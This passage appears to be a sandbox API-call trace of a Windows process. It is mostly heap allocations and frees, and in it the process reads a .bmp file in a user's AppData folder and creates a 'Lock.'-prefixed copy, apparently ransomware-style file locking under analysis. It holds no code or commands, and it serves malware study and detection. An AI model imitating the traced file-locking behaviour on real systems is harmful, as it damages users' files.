Size=0x8) returned 0x24b1798 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0190.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0190.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0190.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0190.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0190.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/7sqV8uLS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7sqv8uls.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0190.723] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.723] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0190.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0190.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.724] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.724] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0190.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.724] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.7sqV8uLS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.7sqv8uls.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0190.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0190.724] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0190.724] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.724] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.725] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0190.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.725] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0190.725] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x552a, lpOverlapped=0x0) returned 1 [0190.726] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0190.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0190.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x552a) returned 0x34a2048 [0190.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.727] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0190.727] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0190.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0190.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x552a) returned 0x34a2048 [0190.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1858 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0190.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0190.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x552a) returned 0x24dcf90 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0190.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0190.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0190.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0190.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0190.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.732] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.732] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0190.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0190.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.733] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.733] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0190.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.733] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0190.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.734] 